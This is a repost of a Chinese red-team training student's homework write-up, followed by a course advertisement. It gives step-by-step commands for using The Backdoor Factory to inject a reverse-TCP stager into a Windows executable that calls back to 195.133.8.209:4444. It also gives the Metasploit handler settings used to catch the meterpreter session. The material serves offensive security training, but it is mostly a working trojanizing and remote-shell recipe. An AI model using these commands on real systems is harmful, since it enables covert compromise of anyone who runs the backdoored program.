红队培训班作业 | backdoor制作后门文件并上线MSF
2021-07-21 12:55:57 Author: mp.weixin.qq.com(查看原文) 阅读量:92 收藏

文章来源|MS08067 红队培训班第9节课作业

本文作者:莫名的Low(红队培训班学员)

按老师要求完成布置的作业如下:

backdoor下载地址:https://github.com/secretsquirrel/the-backdoor-factory

docker下载⽅式

docker pull secretsquirrel/the-backdoor-factorydocker run -it secretsquirrel/the-backdoor-factorybash# ./backdoor.py

docker复制⽂件操作命令

# 从本机复制⽂件到dockerdocker cp /Users/apple/Desktop/qudong.exe0a6bd922d35d:/root/# 从docker复制⽂件到本机docker cp 0a6bd922d35d:/the-backdoor-factory/backdoored/1.exe /Users/apple/Desktop/

查看该应⽤程序是否可以植⼊后⻔

./backdoor.py -f /root/qudong.exe -S

查看该应⽤程序的内存缝隙

./backdoor.py -f /root/qudong.exe -c

查看可以使⽤的poc

./backdoor.py -f /root/qudong.exe -s show

设置监听地址和端⼝还有poc

./backdoor.py -f /root/qudong.exe -s

iat_reverse_tcp_stager_threaded -H 195.133.8.209 -P 4444 -o 1.exe

选择植⼊到哪个内存缝隙中,这⾥选择2

将⽂件复制到靶机中,点击运⾏,msf成功上线

msf配置⽅法

use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset LHOST 195.133.8.209run
问题:

1、靶机上的恶意程序总是会⾃动退出,在任务管理器⾥看程序运⾏⼀会就会⾃动退出,有时候获取了meterpreter过⼀会也会断联,很不稳定

2、设置的后⻔⽂件⽆法连接公⽹地址,我将靶机设置为桥接模式然后运⾏backdoor后⻔⽂件也⽆法连接上,只有msf和靶机均在nat模式下的局域⽹内才能监听到

号外

红队安全培训 第二期班 预计8月13号开班,第二期的课程大纲目录根据第一期班的同学的反馈和要求,会有重大调整,增加了更多的实战中红队的渗透思路和实战技巧干货,具体授课目录可联系小客服获取!

扫描下方二维码加入星球学习

加入后邀请你进入内部微信群,内部微信群永久有效!

 

 

来和5000+位同学一起加入星球学习吧!



文章来源: http://mp.weixin.qq.com/s?__biz=MzU1NjgzOTAyMg==&mid=2247494477&idx=1&sn=00b243513bb360a93ab25feec15e1394&chksm=fc3c524ccb4bdb5a005a2cdf8288ac49ba77bd3feb02c1689518f8a595e4911fb6800e54d450#rd
如有侵权请联系:admin#unsafe.sh